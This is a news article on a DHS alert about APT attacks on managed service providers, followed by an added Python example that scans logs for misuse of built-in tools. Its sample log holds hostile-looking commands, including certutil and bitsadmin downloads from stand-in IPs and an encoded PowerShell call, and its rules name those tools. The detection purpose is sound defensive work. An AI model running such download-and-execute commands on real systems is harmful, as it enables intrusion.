The recent Department of Homeland Security alert describing ongoing cyberattacks on global managed service providers highlights the need for the U.S. government to take a lead role in protecting internet infrastructure, according to some industry cybersecurity experts.
On Oct. 3, DHS’ National Cybersecurity and Communications Integration Center (NCCIC) issued an alert reporting that it is “aware of ongoing APT [Advanced Persistent Threat] actor activity attempting to infiltrate the networks of global managed service providers (MSPs).”
According to NCCIC, APT actors have used a range of tactics, techniques, and procedures (TTPs) since May 2016 for cyber espionage and intellectual property theft. These attacks have targeted several U.S. critical infrastructure sectors, including Information Technology, Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.
MSPs provide remote management of customer information technology and end-user systems, allowing enterprises and government agencies to scale and support their network environments at a lower cost than building these capabilities internally. However, if the network connectivity between the MSP and its customers’ networks is compromised, that connectivity can serve as a pathway into many customers’ networks at once.
“Using an MSP significantly increases an organization’s virtual enterprise infrastructure footprint and its number of privileged accounts, creating a larger attack surface for cyber criminals and nation-state actors,” the NCCIC alert states. An attacker holding compromised MSP credentials can move in both directions between the MSP’s network and the networks it shares with its customers.
The recent DHS alerts about cyberattacks on managed services and cloud providers highlight the difficult task that enterprises and municipal governments face as their IT and cyber operations teams work to protect critical assets and information, said Pravin Kothari, CEO of CipherCloud. This cloud security company develops secure gateways that encrypt sensitive information before it is stored in cloud infrastructures.
“Enterprise and government cannot face off against well-funded nation-state attackers or large-scale organized crime. It is a ridiculous proposition to believe otherwise,” he said. To that end, “the U.S. government needs to step in and defend our internet infrastructure so that normal commerce and communications can continue unhindered,” Kothari said.
“We must do this within the rule of law, put all of the evidence out there in the view of the global community, and enlist the support of our allies to ensure we are successful,” he added.
APT Techniques
APT attackers use a range of “living off the land” techniques to maintain anonymity while conducting their attacks. These techniques include using legitimate credentials, trusted off-the-shelf applications, and pre-installed system tools already present in MSP customer networks. Because this activity blends in with routine administration, and because the actors also move data through common cloud services, data exfiltration can be difficult for network defenders to detect, according to the NCCIC.
“The sophistication of these attacks means that companies will have to continuously review their digital assets and that of their third-party vendors and business partners to ensure that all vulnerabilities are detected and patched,” said Matan Or-El, CEO of security company Panorays.
“Recent evidence is showing that the supply chain is becoming an increasingly popular attack surface, even in the government sector as illustrated by the recent incidents related to GovPayNow and Pay2Gov,” he said.
In September, security analysts revealed that GovPayNet, which manages online payments for U.S. government agencies via the domain GovPayNow.com, exposed at least six years of customer data. The exposed information includes names, addresses, phone numbers, and the last four digits of credit cards submitted through online payment systems. It is estimated that 14 million records were exposed.
MSP clients should understand the supply chain risk associated with their MSP, NCCIC advised. “MSP clients should also refer to cloud security guidance from the National Institute of Standards and Technology to learn about MSP terms of service, architecture, security controls, and risks associated with cloud computing and data protection.”
Additionally, enterprises and government agencies should configure system logging so that incidents can be detected and the type and scope of malicious activity identified. Properly configured logs enable rapid containment and an appropriate response, NCCIC states.
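The two points above, living-off-the-land tooling and logging that is configured to surface it, can be made concrete with a small detection pass. The following is an added example written for this page; it is not code from the article, from NCCIC, or from any vendor quoted here. It runs over a handful of constructed, simplified process-creation and logon log lines and flags (a) pre-installed Windows tools invoked with download or encoded-command switches, and (b) remote logons by an MSP-owned privileged account outside an agreed maintenance window. The log format, the account name CORP\msp-svc, the 09:00 to 18:00 window, and the tool list are all assumptions for illustration.

```python
"""Added example: flag living-off-the-land tool use and out-of-window MSP
logons in constructed log lines. Not from the article or the NCCIC alert."""
import re
from dataclasses import dataclass
from datetime import datetime, time
from typing import Dict, List, Optional, Set

# Constructed sample log. Fields: timestamp | event | user | host | detail
# (for PROCESS events, detail is the command line; for LOGON, the logon type).
# IP addresses are from the TEST-NET documentation ranges.
SAMPLE_LOGS = """\
2018-10-02T03:12:44|PROCESS|CORP\\msp-svc|FILESRV01|certutil.exe -urlcache -split -f http://203.0.113.10/a.txt a.txt
2018-10-02T03:13:02|PROCESS|CORP\\msp-svc|FILESRV01|powershell.exe -nop -w hidden -enc SQBFAFgA...
2018-10-02T09:05:11|LOGON|CORP\\jsmith|WKSTN22|type=2
2018-10-02T22:41:19|LOGON|CORP\\msp-svc|DC01|type=10
2018-10-02T11:30:00|LOGON|CORP\\msp-svc|DC01|type=10
2018-10-02T11:31:07|PROCESS|CORP\\msp-svc|DC01|svchost.exe -k netsvcs
2018-10-02T14:02:55|PROCESS|CORP\\jsmith|WKSTN22|bitsadmin.exe /transfer job /download /priority high http://198.51.100.7/x.exe C:\\Users\\Public\\x.exe
"""

# Assumed: the MSP's privileged account(s) and the local-time window in which
# their remote logons are expected. Real deployments would pull this from an
# inventory and the MSP contract.
MSP_ACCOUNTS: Set[str] = {"CORP\\msp-svc"}
MAINTENANCE_WINDOW = (time(9, 0), time(18, 0))
REMOTE_LOGON_TYPES = {"3", "10"}  # Windows logon types: network, RemoteInteractive (RDP)

# Command-line patterns for pre-installed tools commonly abused to fetch or run payloads.
LOLBIN_RULES = [
    ("certutil_download", re.compile(r"^certutil(\.exe)?\b.*-urlcache\b", re.I)),
    ("bitsadmin_transfer", re.compile(r"^bitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("powershell_encoded", re.compile(r"^powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I)),
    ("mshta_remote", re.compile(r"^mshta(\.exe)?\b.*https?://", re.I)),
    ("regsvr32_scriptlet", re.compile(r"^regsvr32(\.exe)?\b.*/i:https?://", re.I)),
]


@dataclass
class Event:
    ts: datetime
    kind: str   # "PROCESS" or "LOGON"
    user: str
    host: str
    detail: str


@dataclass
class Finding:
    rule: str
    event: Event


def parse_line(line: str) -> Optional[Event]:
    """Parse one pipe-delimited line; return None for lines that do not fit the format."""
    parts = line.strip().split("|", 4)
    if len(parts) != 5:
        return None
    ts, kind, user, host, detail = parts
    try:
        return Event(datetime.fromisoformat(ts), kind, user, host, detail)
    except ValueError:
        return None


def detect(log_text: str) -> List[Finding]:
    """Apply the LOLBin rules to PROCESS events and the window rule to MSP LOGON events."""
    findings: List[Finding] = []
    start, end = MAINTENANCE_WINDOW
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        if ev.kind == "PROCESS":
            for name, pattern in LOLBIN_RULES:
                if pattern.search(ev.detail):
                    findings.append(Finding(name, ev))
                    break
        elif ev.kind == "LOGON" and ev.user in MSP_ACCOUNTS:
            m = re.search(r"type=(\d+)", ev.detail)
            in_window = start <= ev.ts.time() < end
            if m and m.group(1) in REMOTE_LOGON_TYPES and not in_window:
                findings.append(Finding("msp_logon_outside_window", ev))
    return findings


def correlate(findings: List[Finding]) -> Set[str]:
    """Return users that have both an out-of-window MSP logon and a LOLBin execution.
    Either signal alone is noisy; the pair on one account is worth paging on."""
    by_user: Dict[str, Set[str]] = {}
    for f in findings:
        by_user.setdefault(f.event.user, set()).add(f.rule)
    return {u for u, rules in by_user.items()
            if "msp_logon_outside_window" in rules and len(rules - {"msp_logon_outside_window"}) > 0}


if __name__ == "__main__":
    results = detect(SAMPLE_LOGS)
    for f in results:
        print(f"{f.event.ts.isoformat()} {f.rule:26} {f.event.user} on {f.event.host}")
    print("escalate:", sorted(correlate(results)))
```

Two caveats a practitioner would add: the LOLBin rules only fire if process creation is logged with full command lines (Sysmon event 1 or Windows 4688 with command-line auditing enabled), which is exactly the configuration step the paragraph above is calling for; and the maintenance-window rule depends on the MSP actually telling you when it works, so the window belongs in the contract, not only in the detection code.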
Moreover, an organization’s ability to rapidly respond to and recover from an incident begins with the development of an incident response capability. An organization’s response capability should focus on being prepared to handle the most common attack vectors such as spearphishing, malicious web content, and credential theft, according to NCCIC.